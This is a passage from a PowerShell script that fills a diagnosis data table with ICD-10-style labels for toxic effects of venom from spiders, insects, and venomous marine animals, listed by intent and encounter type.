accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, accidental (unintentional)","Toxic effect of unspecified spider venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, intentional self-harm","Toxic effect of unspecified spider venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, intentional self-harm","Toxic effect of unspecified spider venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, intentional self-harm","Toxic effect of unspecified spider venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, assault","Toxic effect of unspecified spider venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, assault","Toxic effect of unspecified spider venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, assault","Toxic effect of unspecified spider venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, undetermined","Toxic effect of unspecified spider venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, undetermined","Toxic effect of unspecified spider venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, undetermined","Toxic effect of unspecified spider venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, accidental (unintentional)","Toxic effect of venom of black widow spider, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, accidental (unintentional)","Toxic effect of venom of black widow spider, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, accidental (unintentional)","Toxic effect of venom of black widow spider, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, intentional self-harm","Toxic effect of venom of black widow spider, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, intentional self-harm","Toxic effect of venom of black widow spider, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, intentional self-harm","Toxic effect of venom of black widow spider, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, assault","Toxic effect of venom of black widow spider, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, assault","Toxic effect of venom of black widow spider, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, assault","Toxic effect of venom of black widow spider, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, undetermined","Toxic effect of venom of black widow spider, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, undetermined","Toxic effect of venom of black widow spider, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of black widow spider, undetermined","Toxic effect of venom of black widow spider, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, accidental (unintentional)","Toxic effect of venom of tarantula, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, accidental (unintentional)","Toxic effect of venom of tarantula, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, accidental (unintentional)","Toxic effect of venom of tarantula, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, intentional self-harm","Toxic effect of venom of tarantula, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, intentional self-harm","Toxic effect of venom of tarantula, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, intentional self-harm","Toxic effect of venom of tarantula, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, assault","Toxic effect of venom of tarantula, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, assault","Toxic effect of venom of tarantula, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, assault","Toxic effect of venom of tarantula, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, undetermined","Toxic effect of venom of tarantula, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, undetermined","Toxic effect of venom of tarantula, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of tarantula, undetermined","Toxic effect of venom of tarantula, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, accidental (unintentional)","Toxic effect of venom of brown recluse spider, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, accidental (unintentional)","Toxic effect of venom of brown recluse spider, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, accidental (unintentional)","Toxic effect of venom of brown recluse spider, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, intentional self-harm","Toxic effect of venom of brown recluse spider, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, intentional self-harm","Toxic effect of venom of brown recluse spider, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, intentional self-harm","Toxic effect of venom of brown recluse spider, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, assault","Toxic effect of venom of brown recluse spider, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, assault","Toxic effect of venom of brown recluse spider, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, assault","Toxic effect of venom of brown recluse spider, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, undetermined","Toxic effect of venom of brown recluse spider, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, undetermined","Toxic effect of venom of brown recluse spider, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of brown recluse spider, undetermined","Toxic effect of venom of brown recluse spider, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, accidental (unintentional)","Toxic effect of venom of other spider, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, accidental (unintentional)","Toxic effect of venom of other spider, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, accidental (unintentional)","Toxic effect of venom of other spider, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, intentional self-harm","Toxic effect of venom of other spider, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, intentional self-harm","Toxic effect of venom of other spider, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, intentional self-harm","Toxic effect of venom of other spider, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, assault","Toxic effect of venom of other spider, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, assault","Toxic effect of venom of other spider, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, assault","Toxic effect of venom of other spider, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, undetermined","Toxic effect of venom of other spider, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, undetermined","Toxic effect of venom of other spider, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other spider, undetermined","Toxic effect of venom of other spider, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional)","Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional)","Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional)","Toxic effect of venom of centipedes and venomous millipedes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm","Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm","Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm","Toxic effect of venom of centipedes and venomous millipedes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, assault","Toxic effect of venom of centipedes and venomous millipedes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, assault","Toxic effect of venom of centipedes and venomous millipedes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, assault","Toxic effect of venom of centipedes and venomous millipedes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, undetermined","Toxic effect of venom of centipedes and venomous millipedes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, undetermined","Toxic effect of venom of centipedes and venomous millipedes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of centipedes and venomous millipedes, undetermined","Toxic effect of venom of centipedes and venomous millipedes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, accidental (unintentional)","Toxic effect of venom of ants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, accidental (unintentional)","Toxic effect of venom of ants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, accidental (unintentional)","Toxic effect of venom of ants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, intentional self-harm","Toxic effect of venom of ants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, intentional self-harm","Toxic effect of venom of ants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, intentional self-harm","Toxic effect of venom of ants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, assault","Toxic effect of venom of ants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, assault","Toxic effect of venom of ants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, assault","Toxic effect of venom of ants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, undetermined","Toxic effect of venom of ants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, undetermined","Toxic effect of venom of ants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of ants, undetermined","Toxic effect of venom of ants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, accidental (unintentional)","Toxic effect of venom of caterpillars, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, accidental (unintentional)","Toxic effect of venom of caterpillars, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, accidental (unintentional)","Toxic effect of venom of caterpillars, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, intentional self-harm","Toxic effect of venom of caterpillars, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, intentional self-harm","Toxic effect of venom of caterpillars, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, intentional self-harm","Toxic effect of venom of caterpillars, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, assault","Toxic effect of venom of caterpillars, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, assault","Toxic effect of venom of caterpillars, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, assault","Toxic effect of venom of caterpillars, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, undetermined","Toxic effect of venom of caterpillars, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, undetermined","Toxic effect of venom of caterpillars, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of caterpillars, undetermined","Toxic effect of venom of caterpillars, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, accidental (unintentional)","Toxic effect of venom of bees, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, accidental (unintentional)","Toxic effect of venom of bees, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, accidental (unintentional)","Toxic effect of venom of bees, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, intentional self-harm","Toxic effect of venom of bees, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, intentional self-harm","Toxic effect of venom of bees, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, intentional self-harm","Toxic effect of venom of bees, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, assault","Toxic effect of venom of bees, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, assault","Toxic effect of venom of bees, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, assault","Toxic effect of venom of bees, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, undetermined","Toxic effect of venom of bees, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, undetermined","Toxic effect of venom of bees, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of bees, undetermined","Toxic effect of venom of bees, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, accidental (unintentional)","Toxic effect of venom of hornets, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, accidental (unintentional)","Toxic effect of venom of hornets, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, accidental (unintentional)","Toxic effect of venom of hornets, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, intentional self-harm","Toxic effect of venom of hornets, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, intentional self-harm","Toxic effect of venom of hornets, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, intentional self-harm","Toxic effect of venom of hornets, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, assault","Toxic effect of venom of hornets, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, assault","Toxic effect of venom of hornets, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, assault","Toxic effect of venom of hornets, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, undetermined","Toxic effect of venom of hornets, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, undetermined","Toxic effect of venom of hornets, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of hornets, undetermined","Toxic effect of venom of hornets, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, accidental (unintentional)","Toxic effect of venom of wasps, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, accidental (unintentional)","Toxic effect of venom of wasps, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, accidental (unintentional)","Toxic effect of venom of wasps, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, intentional self-harm","Toxic effect of venom of wasps, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, intentional self-harm","Toxic effect of venom of wasps, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, intentional self-harm","Toxic effect of venom of wasps, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, assault","Toxic effect of venom of wasps, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, assault","Toxic effect of venom of wasps, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, assault","Toxic effect of venom of wasps, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, undetermined","Toxic effect of venom of wasps, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, undetermined","Toxic effect of venom of wasps, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of wasps, undetermined","Toxic effect of venom of wasps, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, accidental (unintentional)","Toxic effect of venom of other arthropod, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, accidental (unintentional)","Toxic effect of venom of other arthropod, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, accidental (unintentional)","Toxic effect of venom of other arthropod, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, intentional self-harm","Toxic effect of venom of other arthropod, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, intentional self-harm","Toxic effect of venom of other arthropod, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, intentional self-harm","Toxic effect of venom of other arthropod, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, assault","Toxic effect of venom of other arthropod, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, assault","Toxic effect of venom of other arthropod, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, assault","Toxic effect of venom of other arthropod, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, undetermined","Toxic effect of venom of other arthropod, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, undetermined","Toxic effect of venom of other arthropod, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other arthropod, undetermined","Toxic effect of venom of other arthropod, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, accidental (unintentional)","Toxic effect of contact with stingray, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, accidental (unintentional)","Toxic effect of contact with stingray, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, accidental (unintentional)","Toxic effect of contact with stingray, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, intentional self-harm","Toxic effect of contact with stingray, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, intentional self-harm","Toxic effect of contact with stingray, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, intentional self-harm","Toxic effect of contact with stingray, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, assault","Toxic effect of contact with stingray, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, assault","Toxic effect of contact with stingray, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, assault","Toxic effect of contact with stingray, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, undetermined","Toxic effect of contact with stingray, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, undetermined","Toxic effect of contact with stingray, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with stingray, undetermined","Toxic effect of contact with stingray, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, accidental (unintentional)","Toxic effect of contact with other venomous fish, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, accidental (unintentional)","Toxic effect of contact with other venomous fish, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, accidental (unintentional)","Toxic effect of contact with other venomous fish, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, intentional self-harm","Toxic effect of contact with other venomous fish, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, intentional self-harm","Toxic effect of contact with other venomous fish, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, intentional self-harm","Toxic effect of contact with other venomous fish, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, assault","Toxic effect of contact with other venomous fish, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, assault","Toxic effect of contact with other venomous fish, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, assault","Toxic effect of contact with other venomous fish, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, undetermined","Toxic effect of contact with other venomous fish, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, undetermined","Toxic effect of contact with other venomous fish, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous fish, undetermined","Toxic effect of contact with other venomous fish, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, accidental (unintentional)","Toxic effect of contact with Portugese Man-o-war, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, accidental (unintentional)","Toxic effect of contact with Portugese Man-o-war, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, accidental (unintentional)","Toxic effect of contact with Portugese Man-o-war, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, intentional self-harm","Toxic effect of contact with Portugese Man-o-war, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, intentional self-harm","Toxic effect of contact with Portugese Man-o-war, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, intentional self-harm","Toxic effect of contact with Portugese Man-o-war, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, assault","Toxic effect of contact with Portugese Man-o-war, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, assault","Toxic effect of contact with Portugese Man-o-war, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, assault","Toxic effect of contact with Portugese Man-o-war, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, undetermined","Toxic effect of contact with Portugese Man-o-war, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, undetermined","Toxic effect of contact with Portugese Man-o-war, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with Portugese Man-o-war, undetermined","Toxic effect of contact with Portugese Man-o-war, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, accidental (unintentional)","Toxic effect of contact with other jellyfish, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, accidental (unintentional)","Toxic effect of contact with other jellyfish, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, accidental (unintentional)","Toxic effect of contact with other jellyfish, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, intentional self-harm","Toxic effect of contact with other jellyfish, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, intentional self-harm","Toxic effect of contact with other jellyfish, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, intentional self-harm","Toxic effect of contact with other jellyfish, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, assault","Toxic effect of contact with other jellyfish, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, assault","Toxic effect of contact with other jellyfish, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, assault","Toxic effect of contact with other jellyfish, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, undetermined","Toxic effect of contact with other jellyfish, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, undetermined","Toxic effect of contact with other jellyfish, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other jellyfish, undetermined","Toxic effect of contact with other jellyfish, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, accidental (unintentional)","Toxic effect of contact with sea anemone, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, accidental (unintentional)","Toxic effect of contact with sea anemone, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, accidental (unintentional)","Toxic effect of contact with sea anemone, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, intentional self-harm","Toxic effect of contact with sea anemone, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, intentional self-harm","Toxic effect of contact with sea anemone, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, intentional self-harm","Toxic effect of contact with sea anemone, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, assault","Toxic effect of contact with sea anemone, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, assault","Toxic effect of contact with sea anemone, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, assault","Toxic effect of contact with sea anemone, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, undetermined","Toxic effect of contact with sea anemone, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, undetermined","Toxic effect of contact with sea anemone, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with sea anemone, undetermined","Toxic effect of contact with sea anemone, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, accidental (unintentional)","Toxic effect of contact with other venomous marine animals, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, accidental (unintentional)","Toxic effect of contact with other venomous marine animals, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, accidental (unintentional)","Toxic effect of contact with other venomous marine animals, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, intentional self-harm","Toxic effect of contact with other venomous marine animals, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, intentional self-harm","Toxic effect of contact with other venomous marine animals, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, intentional self-harm","Toxic effect of contact with other venomous marine animals, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, assault","Toxic effect of contact with other venomous marine animals, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, assault","Toxic effect of contact with other venomous marine animals, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of contact with other venomous marine animals, assault","Toxic effect of 